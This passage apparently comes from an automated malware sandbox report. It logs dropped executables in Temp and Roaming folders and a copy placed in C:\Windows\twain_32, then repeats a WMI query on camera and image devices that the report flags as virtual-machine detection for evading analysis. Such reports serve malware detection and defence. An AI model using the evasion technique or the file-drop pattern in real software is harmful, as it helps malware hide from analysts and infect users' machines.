Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
